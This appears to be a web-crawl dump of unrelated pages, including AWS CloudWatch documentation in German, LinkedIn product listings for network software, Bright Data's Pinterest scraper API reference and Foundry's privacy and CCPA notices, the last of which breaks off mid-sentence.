Agent unterstützt sowohl Windows- als auch Linux-Betriebssysteme und kann zur zentralen Konfigurationsverwaltung in Systems Manager integriert werden. Kontoübergreifende Überwachung CloudWatch Mit der kontenübergreifenden Observability können Sie ein zentrales Überwachungskonto einrichten, um Anwendungen zu überwachen und Fehler zu beheben, die sich über mehrere Konten erstrecken. Über das zentrale Konto können Sie Metriken, Protokolle und Ablaufverfolgungen von Quellkonten in Ihrer gesamten Organisation einsehen. Dieser zentralisierte Ansatz ermöglicht es Ihnen, kontenübergreifende Dashboards zu erstellen, Alarme einzurichten, die Metriken mehrerer Konten zu überwachen, und Ursachenanalysen über Kontogrenzen hinweg durchzuführen. Mit der CloudWatch kontenübergreifenden Observability können Sie Quellkonten entweder einzeln oder automatisch miteinander verknüpfen. AWS Organizations Lösungskatalog CloudWatch bietet einen Katalog leicht verfügbarer Konfigurationen, mit denen Sie schnell die Überwachung verschiedener AWS Dienste und gängiger Workloads wie Java Virtual Machines (JVM), NVIDIA GPU, Apache Kafka, Apache Tomcat und NGINX implementieren können. Diese Lösungen bieten gezielte Anleitungen, einschließlich Anweisungen zur Installation und Konfiguration des CloudWatch Agenten, zur Bereitstellung vordefinierter benutzerdefinierter Dashboards und zur Einrichtung entsprechender Alarme. Netzwerk- und Internetüberwachung CloudWatch bietet umfassende Netzwerk- und Internetüberwachungsfunktionen über CloudWatch Network Monitoring. Internet Monitor verwendet AWS globale Netzwerkdaten, um die Internetleistung und Verfügbarkeit zwischen Ihren Anwendungen und Endbenutzern zu analysieren. Mit einem Internetmonitor können Sie erhöhte Latenzzeiten oder regionale Störungen, die sich auf Ihre Kunden auswirken, erkennen oder Benachrichtigungen erhalten. Internetmonitore analysieren Ihre VPC-Flussprotokolle, um automatisierte Einblicke in die Muster und die Leistung des Netzwerkverkehrs zu erhalten. Sie können ebenfalls Vorschläge dazu erhalten, wie Sie die Anwendungsleistung für Ihre Clients optimieren können. Network Flow Monitor zeigt Informationen zur Netzwerkleistung an, die von einfachen Softwareagenten gesammelt wurden, die Sie auf Ihren Instances installieren. Mithilfe eines Flow Monitors können Sie schnell den Paketverlust und die Latenz Ihrer Netzwerkverbindungen über einen von Ihnen festgelegten Zeitraum visualisieren. Jeder Monitor generiert außerdem einen Netzwerkstatusindikator (Network Health Indicator, NHI), der Ihnen mitteilt, ob während des von Ihnen untersuchten Zeitraums AWS Netzwerkprobleme bei den Netzwerkströmen aufgetreten sind, die von Ihrem Monitor aufgezeichnet wurden. Wenn Sie eine Verbindung herstellen Direct Connect, können Sie synthetische Monitore in Network Synthetic Monitor verwenden, um die Netzwerkkonnektivität proaktiv zu überwachen, indem Sie synthetische Tests zwischen einer VPC und lokalen Endpunkten ausführen. Wenn Sie einen synthetischen Monitor erstellen, geben Sie Tests an, indem Sie ein VPC-Subnetz und lokale IP-Adressen angeben. AWS erstellt und verwaltet die Infrastruktur im Hintergrund, die für die Durchführung von Messungen der Umlaufzeit und des Paketverlusts mit den Sonden erforderlich ist. Diese Tests erkennen Probleme mit Konnektivität, DNS und Latenz, bevor sie sich auf Ihre Anwendungen auswirken, sodass Sie Maßnahmen ergreifen können, um die Erfahrung Ihrer Endbenutzer zu verbessern. Fakturierung und Kosten Vollständige Informationen zu den CloudWatch Preisen finden Sie unter CloudWatch Amazon-Preise . Informationen, die Ihnen helfen können, Ihre Rechnung zu analysieren und möglicherweise Kosten zu optimieren und zu senken, finden Sie unter CloudWatch Kosten analysieren, optimieren und reduzieren . CloudWatch Amazon-Ressourcen Die folgenden verwandten Ressourcen bieten Ihnen nützliche Informationen für die Arbeit mit diesem Service. Ressource Description Amazon CloudWatch FAQs Die Webseite „Häufig gestellte Fragen” deckt alle wichtigsten Fragen ab, die Entwickler zu diesem Produkt gestellt haben. AWS Entwicklerzentrum Ein zentraler Ausgangspunkt, um Dokumentation, Codebeispiele, Versionshinweise und andere Informationen zu finden, mit denen Sie innovative Anwendungen entwickeln können AWS. AWS-Managementkonsole Mit der Konsole können Sie die meisten Funktionen von Amazon CloudWatch und verschiedenen anderen AWS Angeboten ohne Programmierung ausführen. CloudWatch Amazon-Diskussionsforen Community-basiertes Forum für Entwickler zur Diskussion technischer Fragen zu Amazon. CloudWatch AWS Support Die zentrale Anlaufstelle für die Erstellung und Verwaltung Ihrer AWS Support Fälle. Enthält auch Links zu anderen hilfreichen Ressourcen wie Foren, technischen InformationenFAQs, Servicestatus und AWS Trusted Advisor. CloudWatch Amazon-Produktinformationen Die primäre Webseite für Informationen über Amazon CloudWatch. Kontakt Eine zentrale Anlaufstelle für Anfragen zu AWS Abrechnung, Konto, Veranstaltungen, Missbrauch usw. JavaScript ist in Ihrem Browser nicht verfügbar oder deaktiviert. Zur Nutzung der AWS-Dokumentation muss JavaScript aktiviert sein. Weitere Informationen finden auf den Hilfe-Seiten Ihres Browsers. Dokumentkonventionen Einrichten Hat Ihnen diese Seite geholfen? – Ja Vielen Dank, dass Sie uns mitgeteilt haben, dass wir gute Arbeit geleistet haben! Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, was wir richtig gemacht haben, damit wir noch besser werden? Hat Ihnen diese Seite geholfen? – Nein Vielen Dank, dass Sie uns mitgeteilt haben, dass diese Seite überarbeitet werden muss. Es tut uns Leid, dass wir Ihnen nicht weiterhelfen konnten. Würden Sie sich einen Moment Zeit nehmen, um uns mitzuteilen, wie wir die Dokumentation verbessern können? | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/axiros-ax-dhcp-ip-address-management-ipam-software/?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_image-click | AX DHCP | IP Address Management (IPAM) Software | LinkedIn Skip to main content LinkedIn Axiros in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in AX DHCP | IP Address Management (IPAM) Software IP Address Management (IPAM) Software by Axiros See who's skilled in this Add as skill Request demo Report this product About AX DHCP server is a clusterable carrier-grade DHCP / IPAM (IP Address Management) solution that can be seamlessly integrated within given provisioning platforms. AX DHCP copes with FttH, ONT provisioning, VOIP and IPTV services. Telecommunications carriers and internet service providers (ISPs) need powerful and robust infrastructure that supports future workloads. DDI (DNS-DHCP-IPAM) is a critical networking technology for every service provider that ensures customer services availability, security and performance. Media Products media viewer No more previous content AX DHCP AX DHCP AX DHCP DHCP AX DHCP | Presentation No more next content Similar products Next-Gen IPAM Next-Gen IPAM IP Address Management (IPAM) Software Tidal LightMesh Tidal LightMesh IP Address Management (IPAM) Software ManageEngine OpUtils ManageEngine OpUtils IP Address Management (IPAM) Software Numerus Numerus IP Address Management (IPAM) Software dedicated datacenter proxies dedicated datacenter proxies IP Address Management (IPAM) Software Sign in to see more Show more Show less Axiros products AX BIZ | Business Router Management Software AX BIZ | Business Router Management Software Network Management Software AX DOCSIS | Carrier Grade DOCSIS Provisioning AX DOCSIS | Carrier Grade DOCSIS Provisioning AX MOBILITY | SDK For Mobile Apps AX MOBILITY | SDK For Mobile Apps Software Development Kits (SDK) AX USP | Controller AX USP | Controller Axiros AXACT | Embedded Connectivity Axiros AXACT | Embedded Connectivity Internet of Things (IoT) Software Axiros AXESS | TR-069 Auto Configuration Server (ACS) Axiros AXESS | TR-069 Auto Configuration Server (ACS) Internet of Things (IoT) Software Axiros AXTRACT | QoE Monitoring Axiros AXTRACT | QoE Monitoring Predictive Analytics Software AXWIFI | WiFi Optimization & Management Software AXWIFI | WiFi Optimization & Management Software Predictive Analytics Software Show more Show less LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://es-la.facebook.com/login/?next=https%3A%2F%2Fl.facebook.com%2Fl.php%3Fu%3Dhttps%253A%252F%252Fwww.instagram.com%252F%26amp%253Bh%3DAT2FpiAS5Z4gP0BLmRzfuo4BALg9YPzbZ9ghFRCmHt3Onrjp0xwiTLO3A5FDz8P8Zb_hiTX9tVT5JFDef74sOVyazw7vZoOm5R2kajYZw6QBHjevx_fbeeJTebCYVomRxu2_hRi-_Wu4ggdu | Facebook Facebook Correo o teléfono Contraseña ¿Olvidaste tu cuenta? Crear cuenta nueva Se te bloqueó temporalmente Se te bloqueó temporalmente Parece que hiciste un uso indebido de esta función al ir muy rápido. Se te bloqueó su uso temporalmente. Back Español 한국어 English (US) Tiếng Việt Bahasa Indonesia ภาษาไทย 中文(简体) 日本語 Português (Brasil) Français (France) Deutsch Registrarte Iniciar sesión Messenger Facebook Lite Video Meta Pay Tienda de Meta Meta Quest Ray-Ban Meta Meta AI Más contenido de Meta AI Instagram Threads Centro de información de votación Política de privacidad Centro de privacidad Información Crear anuncio Crear página Desarrolladores Empleo Cookies Opciones de anuncios Condiciones Ayuda Importación de contactos y no usuarios Configuración Registro de actividad Meta © 2026 | 2026-01-13T09:29:26 |
https://docs.brightdata.com/api-reference/web-scraper-api/social-media-apis/pinterest#param-url | Pinterest API Scrapers - Bright Data Docs Skip to main content Bright Data Docs home page English Search... ⌘ K Support Sign up Sign up Search... Navigation Social Media APIs Pinterest API Scrapers Welcome Proxy Infrastructure Web Access APIs Data Feeds AI API Reference General Integrations Overview Authentication Terminology Postman collection Python SDK JavaScript SDK Products Unlocker API SERP API Marketplace Dataset API Web Scraper API POST Asynchronous Requests POST Synchronous Requests POST Crawl API Delivery APIs Management APIs Social Media APIs Overview Facebook Instagram LinkedIn TikTok Reddit Twitter Pinterest Quora Vimeo YouTube Scraper Studio API Scraping Shield Proxy Networks Proxy Manager Unlocker & SERP API Deep Lookup API (Beta) Administrative API Account Management API On this page Overview Profiles API Collect by URL Discover by Keywords Posts API Collect by URL Discover by Profile URL Discover by Keywords Social Media APIs Pinterest API Scrapers Copy page Copy page Overview The Pinterest API Suite offers multiple types of APIs, each designed for specific data collection needs from Pinterest. Below is an overview of how these APIs connect and interact, based on the available features: Profiles API This API allows users to collect profile details based on a single input: profile URL. Discovery functionality : Discover by Keywords. Interesting Columns : name , following_count , website , follower_count . Posts API This API allows users to collect multiple posts based on a single input. Discovery functionality : - Discover by profile URL. - Discover by Keywords. Interesting Columns : title , content , user_name , likes . Profiles API Collect by URL This API allows users to retrieve detailed Pinterest profile information using the provided profile URL. Input Parameters : URL string required The Pinterest profile URL. Output Structure : Includes comprehensive data points: Profile Details : url , profile_picture , name , nickname , website , bio , country_code , profile_id . For all data points, click here . Engagement & Metrics : following_count , follower_count , boards_num , saved . Additional Information : last_updated , posts_page_url , discovery_input . This API allows users to collect detailed insights into a Pinterest profile, including user statistics, engagement metrics, and profile information. Discover by Keywords This API allows users to discover Pinterest profiles based on a specified keyword. Input Parameters : keyword string required The keyword to search for profiles. Output Structure : Includes comprehensive data points: Profile Details : url , profile_picture , name , nickname , website , bio , country_code , profile_id . For all data points, click here . Engagement & Metric s: following_count , follower_count , boards_num , saved. Additional Information : last_updated , posts_page_url , discovery_input . This API enables users to find Pinterest profiles related to a specific keyword, offering insights into user statistics, engagement, and profile details. Posts API Collect by URL This API allows users to collect detailed post data from a specific Pinterest post using the provided post URL. Input Parameters : URL string required The Pinterest post URL. Output Structure : Includes comprehensive data points: Post Details : url , post_id , title , content , date_posted , post_type . For all data points, click here . User Details : user_name , user_url , user_id , followers . Post Metrics : likes , comments_num , comments , categories . Media & Attachments : image_video_url , video_length , attached_files . Hashtags & Discovery : hashtags , discovery_input . This API allows users to retrieve detailed insights into a specific Pinterest post, including user engagement, post content, media, and other related information. Discover by Profile URL This API allows users to retrieve posts from a specific Pinterest profile based on the provided profile URL. Input Parameters : URL string required The Pinterest profile URL from which to collect posts. num_of_posts number The number of posts to collect. If omitted, there is no limit. posts_to_not_include array An array of post IDs to exclude from the results. start_date string Start date for filtering posts in MM-DD-YYYY format (should be earlier than end_date ). end_date string End date for filtering posts in MM-DD-YYYY format (should be later than start_date ). Output Structure : Includes comprehensive data points: Post Details : url , post_id , title , content , date_posted , user_name , user_url , user_id , followers , likes , categories , source , attached_files , image_video_url , video_length , hashtags , comments_num , comments , post_type . For all data points, click here . Engagement & Metrics : followers , likes , comments_num . Media & Attachments : image_video_url , video_length , attached_files . Additional Information : discovery_input . This API enables users tso collect posts from a specific Pinterest profile, allowing for filtering by date, exclusion of specific posts, and retrieval of detailed post data including media, comments, and engagement metrics. Discover by Keywords This API allows users to discover Pinterest posts based on a specific keyword, enabling efficient content discovery. Input Parameters : keyword string required The keyword to search for posts, such as “food” or any other relevant term. Output Structure : Includes comprehensive data points: Post Details : url , post_id , title , content , date_posted , user_name , user_url , user_id , followers , likes , categories , source , attached_files , image_video_url , video_length , hashtags , comments_num , comments , post_type . For all data points, click here . Engagement & Metrics : followers , likes , comments_num . Media & Attachments : image_video_url , video_length , attached_files . Additional Information : discovery_input . This API enables users to search for Pinterest posts based on a specific keyword, providing detailed insights into the content, engagement, media, and associated metrics for efficient discovery. Was this page helpful? Yes No Twitter Quora ⌘ I linkedin youtube github Powered by | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/categories/network-monitoring-software?trk=products_details_guest_similar_products_section_similar_products_section_product_link_result-card_subtitle-click | Best Network Monitoring Software | Products | LinkedIn Skip to main content LinkedIn Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Clear text Used by Used by Chief Technology Officer (18) Network Administrator (17) Network Engineer (16) Network Specialist (16) Chief Information Security Officer (13) See all products Find top products in Network Monitoring Software category Software used to measure the performance of computer networks. - Track metrics such as speed, latency, availability, response time, and reliability - Use dashboards and visualizations to monitor real-time performance against historical data - Create baseline for performance and receive notifications of variations, failures, and timeouts - Map and monitor networks with failover systems and solutions to address performance issues 147 results NMS Network Monitoring Software by Parsons Corporation The Parsons supported Network Monitoring System (NMS) is a results-oriented, service-based, network anomaly detection tool that solves radio operators’ biggest stability challenge — identifying and resolving issues that are tied to backhaul. Our Land Mobile Radio (LMR) Backhaul Solution makes it easy to identify and resolve issues quickly, reducing the time to resolve issues and improving the overall reliability and performance of your LMR network. View product Network Operations Center (NOC) Network Monitoring Software by OpticoreIT We monitor and run your data network daily with agreed deliverables and service metrics. Applying industry best practices, we give you a robust, reliable and deterministic network managed by a responsive, proactive and skilled team of Opticore engineers. There are three components to the Network Managed Service. Our People Pro-active monitoring by the team of highly skilled and qualified network engineers in our Network Operations Centre (NOC). Our Platform Monitoring through our bespoke Opticore Hosted Management Platform (OHMP), maintained and updated by our NOC team. Our Process Opticore’s service delivery team follow the best practice principles of the ITIL library to ensure that we offer the excellent service to our clients. View product Arbor Sightline Network Monitoring Software by NETSCOUT The network is the business. Operators must optimize resources, reduce service availability threats and thus save money. Arbor Sightline provides robust capabilities from network-wide capacity planning, to identifying and managing the mitigation of threats to the network. This pervasive network data can also be leveraged to make routing and peering design decisions, lower transit costs, eliminate network threats and provide your business with new revenue-generating services. Arbor’s DDoS attack protection solutions are based upon industry-leading technology. NETSCOUT offers a comprehensive portfolio of fully integrated, in‑cloud and on-premise DDoS protection products and services; all backed by continuous global threat intelligence. View product TEMS™ Suite Network Monitoring Software by Infovista TEMS™ Suite is the comprehensive solution for mobile network testing designed to meet the demands of next-generation networks. TEMS Suite empowers you to deliver next-level experience and achieve faster time-to-market for your 5G network. Key Features: 🔹 Efficient Network Validation 🔹 Comprehensive Network Testing 🔹 OTT Voice and Application Testing 🔹 Efficient Competitor Benchmarking 🔹 Proactive Network Monitoring 🔹 Trusted and Recognized Discover the TEMS™ Suite: 🔹 TEMS™ Investigation 🔹 TEMS™ Discovery 🔹 TEMS™ Paragon 🔹 TEMS™ Pocket 🔹 TEMS™ Cloud 🔹 TEMS™ Sense Optimize your mobile network performance, enhance subscriber experience, and achieve your business objectives empowered by TEMS Suite. Visit our official product page to learn more and get in touch. View product Progress Flowmon Network Monitoring Software by Progress Software Flowmon Networks empowers businesses to manage and secure their computer networks confidently. Through our high performance network monitoring technology and lean-forward behavior analytics, IT pros worldwide benefit from absolute network traffic visibility to enhance network & application performance and deal with modern cyber threats. Driven by a passion for technology, we are leading the way of NetFlow/IPFIX network monitoring that is high performing, scalable and easy to use. The world’s largest businesses, internet service providers, government entities or even small and midsize companies rely on our solutions to take control over their networks, keep order and overcome uncertainty. With our solution recognized by Gartner, we are one of the fastest growing companies in the industry. View product Find products trusted by professionals in your network See which products are used by connections in your network and those that share similar job titles Sign in to view full insights ASM Network Monitoring Software by Red Sift Red Sift ASM (Attack Surface Management) continuously discovers, inventories and helps manage your business’s critical external-facing and cloud assets. Complete visibility Get a view into your entire attack surface – including assets you didn't know existed. Fix proactively Be aware of and remediate configuration risks before bad actors can take advantage. Reduce premiums Solve problems before they are visible to your insurer and reduce cyber insurance premiums. View product ONES (Open Networking Enterprise Suite) Network Monitoring Software by Aviz Networks ONES provides deep network visibility, with over 200 metrics, monitoring performance and system health across any ASIC, any switch, all major NOSes and versions of SONiC - empowering you to quickly determine exactly which part of your network is causing an issue and fix it fast. View product I-MAP Network Monitoring Software by ITSS As global transactions continue to surge and business objectives become more complex, the ITSS Monitoring and Analytical Platform (IMAP) offers a comprehensive solution for maximizing operational efficiency. Developed by a team of seasoned Transact experts and performance architects, IMAP is an enterprise-class monitoring tool that provides tailored insights for managing the entire Temenos ecosystem and other enterprise systems. View product Auvik Network Management (ANM) Network Monitoring Software by Auvik Auvik's cloud-based network management software helps IT departments and MSPs gain complete visibility and control over their networks — effortlessly. Within an hour of setup, you’ll have an automatically generated map of your network, complete inventory details on every device, and alerts tuned to industry best practices. Whether you manage one site or hundreds, Auvik makes it easy to monitor performance, analyze traffic, maintain documentation, identify and resolve problems faster, and boost productivity. View product Qoli Network Monitoring Software by Snovasys Software Solutions Ltd Qoli.ai is an advanced mobile monitoring application designed for both businesses and personal users. It provides real-time tracking, productivity insights, and security features to ensure efficient management of employees, devices, or family members. View product See more How it works Explore Discover the best product for your need from a growing catalog of 25,000 products and categories trusted by LinkedIn professionals Learn Evaluate new tools, explore trending products in your industry and see who in your network is skilled in the product Grow Join communities of product users to learn best practices, celebrate your progress and accelerate your career LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English Language | 2026-01-13T09:29:26 |
https://www.linkedin.com/products/technarts-redkit/?trk=products_details_guest_other_products_by_org_section_product_link_result-card_image-click | Redkit | LinkedIn Skip to main content LinkedIn TechNarts-Nart Bilişim in Asan Expand search This button displays the currently selected search type. When expanded it provides a list of search options that will switch the search inputs to match the current selection. Jobs People Learning Clear text Clear text Clear text Clear text Clear text Join now Sign in Redkit Software Configuration Management (SCM) Tools by TechNarts-Nart Bilişim See who's skilled in this Add as skill Contact us Report this product About Redkit is a zero-touch network configuration management solution designed to increase network efficiency and ensure a faultless activation process. As a web-based application, it offers a user-friendly interface and seamless integration capabilities, enabling the live network configuration changes and advanced analysis through the monitoring of network parameters. Its vendor-agnostic structure supports configuration creation and execution, pre- and post-operation validations, consistency checks to ensure fail safe zero touch operations. Redkit also provides a suite of advanced tools, including a service explorer, shared resource analysis, QoS checks, and LSP planning. Featured customers of Redkit Vodafone Telecommunications 2,488,540 followers Similar products HashiCorp Terraform HashiCorp Terraform Software Configuration Management (SCM) Tools Nix Nix Software Configuration Management (SCM) Tools ARCON | Drift Management ARCON | Drift Management Software Configuration Management (SCM) Tools Tripwire Enterprise Tripwire Enterprise Software Configuration Management (SCM) Tools CFEngine CFEngine Software Configuration Management (SCM) Tools Config Master for Salesforce Config Master for Salesforce Software Configuration Management (SCM) Tools Sign in to see more Show more Show less TechNarts-Nart Bilişim products Inventum Inventum Network Monitoring Software MoniCAT MoniCAT Network Monitoring Software Numerus Numerus IP Address Management (IPAM) Software Star Suite Star Suite Network Monitoring Software TART TART Network Traffic Analysis (NTA) Tools Show more Show less LinkedIn © 2026 About Accessibility User Agreement Privacy Policy Cookie Policy Copyright Policy Brand Policy Guest Controls Community Guidelines English (English) Language | 2026-01-13T09:29:26 |
https://www.infoworld.com/member-preferences/ | Member Preferences | InfoWorld Topics Latest Newsletters Resources Buyer’s Guides About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Our Network CIO Computerworld CSO Network World More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Close Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back Close Back Close Popular Topics Artificial Intelligence Cloud Computing Data Management Software Development Search Topics Latest Newsletters Resources Buyer’s Guides About Policies Our Network More Back Topics Analytics Artificial Intelligence Generative AI Careers Cloud Computing Data Management Databases Emerging Technology Technology Industry Security Software Development Microsoft .NET Development Tools Devops Open Source Programming Languages Java JavaScript Python IT Leadership Enterprise Buyer’s Guides Back About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Newsletters Contribute to InfoWorld Reprints Back Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Back Our Network CIO Computerworld CSO Network World Back More News Features Blogs BrandPosts Events Videos Enterprise Buyer’s Guides Home Member Preferences Member Preferences Foundry Co. takes the protection of your personal data very seriously. Protecting your privacy is paramount to us. Compliance with legal provisions — such as the European Union’s General Data Protection Regulation (GDPR), CAN-SPAM Act, the California Consumer Privacy Act (CCPA) and others is a matter of course for us. On this page we want to briefly explain how you can be an active participant in the management of your data and personal preferences. For additional information, please reference Foundry’s privacy policy and cookie policy and Your California Privacy Rights. On this page you’ll be able to: Manage your email subscriptions Learn more about Foundry sponsors and your data Request your Foundry Consent audit log (EU residents) Request for disclosure (California consumers) Request to be Forgotten (EU residents) Request for deletion (California consumers) Request to opt out of the sale of personal data (California consumers) Modify your Cookie Consent settings (EU residents and California consumers) Messaging preferences Foundry provides a variety of messaging capabilities to keep technology professionals abreast of the latest trends, products, opinions and updates to our websites. We appreciate your subscriptions to these services. If for any reason you’d like to discontinue these services, here are a few options. Editorial newsletters Editorial newsletters from InfoWorld such as InfoWorld Daily. To edit preferences or unsubscribe, please use links located at the bottom of your newsletter emails. Sponsored promotions Third-party sponsored promotions (email, direct marketing, SMS/text) To edit preferences or unsubscribe, please use links located at the bottom of your newsletter emails. Unsubscribe from everything If you’d like to discontinue receiving all newsletter and promotions (email, telemarketing, SMS/text) from ALL Foundry brands, please submit your request in writing to websites@foundryco.com (or the mailing address below). Consent Audit Log You are able to request your Foundry consent audit log. If you’d like to request your consent audit log, please submit a request in writing to: DataRequest@foundryco.com (or the mailing address below). Right to Disclosure For California consumers, under CCPA, you are able to request that Foundry disclose the categories and specific pieces of information that it has collected. If you’d like to request such disclosure, please submit a request in writing to: DataRequest@foundryco.com (or the mailing address below) and please put CCPA Request in the subject line. Right to be Forgotten and Right to Deletion For European Union residents under the jurisdiction of GDPR, you are able to request that Foundry remove all personal data from our systems. If you’d like to request to be forgotten, please submit a request in writing to: preferences@foundryco.com (or the mailing address below). Similarly, for California consumers, under the CCPA, you are able to request that Foundry delete any personal data that it has collected, by submitting a request in writing to: preferences@foundryco.com (or the mailing address below) and please put CCPA in the subject line. Right to Opt Out of the Sale of Personal Data Because Foundry does not sell, as defined in the CCPA, personal data, except for cookies, please see the Cookie Consent section below. Cookie Consent Residents of the European Union can review and modify their cookie consent settings for this site at any time by clicking here: European Privacy Settings For California consumers, under the CCPA, you can exercise your right to opt out of the sale of personal data by clicking here: Do Not Sell My Data Mailing address Should you choose to notify us of any of the above preferences by postal service, here is our address: Member Services Foundry Co. 1450 Broadway, 35th Floor New York, NY 10018 United States And now a word from our sponsors … Foundry provides marketing services for businesses around the world. As a subscriber to Foundry’s content, your data may be shared with those entities as described in the Foundry privacy policy . Upon registering for sponsor content, your data may live outside of Foundry’s jurisdiction. To remove yourself from a sponsor’s marketing, please contact the specific sponsor directly. For more information Please contact Foundry’s Data Protection Officer ( GDPR@foundryco.com ). About About Us Advertise Contact Us Editorial Ethics Policy Foundry Careers Reprints Newsletters BrandPosts Policies Terms of Service Privacy Policy Cookie Policy Copyright Notice Member Preferences About AdChoices Your California Privacy Rights Privacy Settings Our Network CIO Computerworld CSO Network World Facebook X YouTube Google News LinkedIn © 2026 FoundryCo, Inc. All Rights Reserved. | 2026-01-13T09:29:26 |
https://foundryco.com/ccpa/ | Your California Privacy Rights Under the CCPA | Foundry Skip to content Search Contact us Translation available Select an experience Japan Global Search for: Search Brands CIO CSO InfoWorld Network World Computerworld Macworld PCWorld Tech Advisor TechHive ChannelWorld Specialty brands CIO100 CSO50 All brands Audiences Artificial intelligence Cloud Security Hardware Software All audiences Solutions Ads Audiences Lead gen Intent data Brand experiences Interactive storytelling Events Partner marketing Content creation Affiliate marketing All solutions Research Technology insights AI Priorities CIO Tech Priorities Cloud Computing Security Priorities State of the CIO Buying process Customer Engagement Role & Influence Partner Marketing All research Resources Resources Tools for marketers Blog Videos Customer stories Developer portal The Intersection newsletter All resources About us Press Awards Work here Privacy / Compliance Licensing About Us Brands CIO CSO InfoWorld Network World Computerworld Macworld PCWorld Tech Advisor TechHive ChannelWorld Specialty brands CIO 100 CSO50 All brands Audiences Artificial intelligence Cloud Security Hardware Software All audiences Solutions Ads Lead gen Intent data Brand experiences Interactive storytelling Events Partner marketing Content creation Affiliate marketing All solutions Research Technology insights AI Priorities CIO Tech Priorities Cloud Computing Security Priorities State of the CIO Buying process Customer Engagement Role & Influence Partner Marketing All research Resources Resources Tools for marketers Blog Videos Customer stories Developer Portal The Intersection newsletter All Resources About us Press Awards Work here Privacy / Compliance Licensing About Us Contact Log in Edition - Select an experience Japan Global Your California Privacy Rights This notice supplements the information contained in the FoundryCo, Inc. (“Foundry” or “we” or “our”) Privacy Policy and applies solely to California consumers, in compliance with the California Consumer Privacy Act of 2018 (“ CCPA ”), as amended by the California Privacy Rights Act of 2020 (“ CPRA ”). The terms “personal data” and “personal information” are used interchangeably. Under Section 1798.140 (v) (1) of the CCPA, personal information is defined as “ information that identifies, relates to, describes, is reasonably capable of being associated with, or could reasonably be linked, directly or indirectly, with a particular consumer or household. Personal information includes, but is not limited to, the following if it identifies, relates to, describes, is reasonably capable of being associated with, or could be reasonably linked, directly or indirectly, with a particular consumer or household .” Under the CCPA, California consumers have the following rights in respect to their personal information: Right to know Right to correct Right to delete Right to opt-out of sale or sharing Right to limit use and disclosure of sensitive personal information Right to non-discrimination Right to know You can request that a business that collects your personal information discloses information about its collection, use, sale, disclosure for business purposes and share of such personal information. Specifically, you can request the following information: the categories of personal information Foundry has collected about you; the specific pieces of personal information Foundry has collected about you; the categories of sources from which your personal information is collected; the business or commercial purpose for collecting or selling or sharing (if applicable) your personal information; the categories of third parties with whom Foundry shares your personal information; and the categories of information Foundry discloses to third parties. More detailed information about the categories, purposes and third parties, as well as how and why we collect your personal information, can be found in Foundry’ Privacy Policy . If you require additional information and/or to exercise your rights under the CCPA to request the categories and specific pieces of personal information Foundry collects, please contact us using the contact details provided below. Right to correct You can request that we correct your personal information that is inaccurate. Upon receiving your request, Foundry will correct your inaccurate personal information. To request correction of your personal information, please contact us using the contact details provided below. Right to delete You can request that we delete any of your personal information that we have collected. Upon your request, Foundry will delete your personal information, and you will not receive any Foundry marketing communications regarding our products, content, or services, unless you subsequently provide your personal information in connection with a new registration or it is otherwise lawfully provided to Foundry. To request that Foundry delete the personal information it has collected from and about you, as described in the Foundry Privacy Policy , please contact us using the contact details provided below. Right to opt-out of sale or sharing You can request a business that sells or shares your personal information to not to sell or share your personal information to third parties, as defined in the CCPA. Under Section 1798.140 (ad) (1) of the CCPA, selling is defined as “ renting, releasing, disclosing, disseminating, making available, transferring, or otherwise communicating orally, in writing, or by electronic or other means, a consumer’s personal information by the business to a third party for monetary or other valuable consideration .” Foundry may sell your personal data, including information collected by cookies, with third parties for the purpose of personalized advertising. Foundry is registered as a data broker under the CCPA. For more information about Foundry’s obligations as a data broker, please visit the data broker registry available here . Under Section 1798.140 (ah) (1) of the CCPA, sharing is defined as “ renting, releasing, disclosing, disseminating, making available, transferring, or otherwise communicating orally, in writing, or by electronic or other means, a consumer’s personal information by the business to a third party for cross-context behavioral advertising, whether or not for monetary or other valuable consideration, including transactions between a business and a third party for cross-context behavioral advertising for the benefit of a business in which no money is exchanged .” Foundry may share your personal information, including information collected by cookies with third parties, for the purpose of personalized advertising. You can opt out of such sharing or selling via our Privacy Settings tab at the bottom of this page or via the following email address at privacy@foundryco.com . For more information about setting your preferences regarding cookies, please see Foundry’s Cookie Policy . We will proceed with your request to opt-out of selling or sharing your personal information within 15 days of receiving your request. Right to limit use and disclosure of sensitive personal information You can request that a business limits the use and disclosure of sensitive personal information collected about you, as defined in the CCPA (for example your social security number, financial account information, precise geolocation data or genetic data). Please note that Foundry does not collect any sensitive personal information. Right to non-discrimination You have the right not to be discriminated against if you choose to exercise any of the above-mentioned rights. We do not offer financial incentives or price or service differences to consumers in exchange for the retention of their personal information. How to submit a request? If you wish to submit a request, please contact us at the following email address privacy@foundryco.com and put “CCPA Request” in the subject line. Should you choose to notify us by postal service, our address is: FoundryCo, Inc. 501 2nd Street, Suite 650 San Francisco California 94107 U.S.A. Please describe your request in sufficient detail that allows us to provide you with the required information and reasonably verify you as the person about whom we collected such personal information. We will disclose and deliver the required information within 45 days of receiving your request. If we require more time (up to 90 days), we will inform you of the reason and extension period in writing (including email). Any disclosure we provide to you only covers the past 12-month period preceding your request. We cannot respond to your request or provide you with the required information if we cannot verify your identity or authority to make such request and/or confirm that the personal information relates to you. Please bear in mind that we have the right to refuse your request including, but not limited 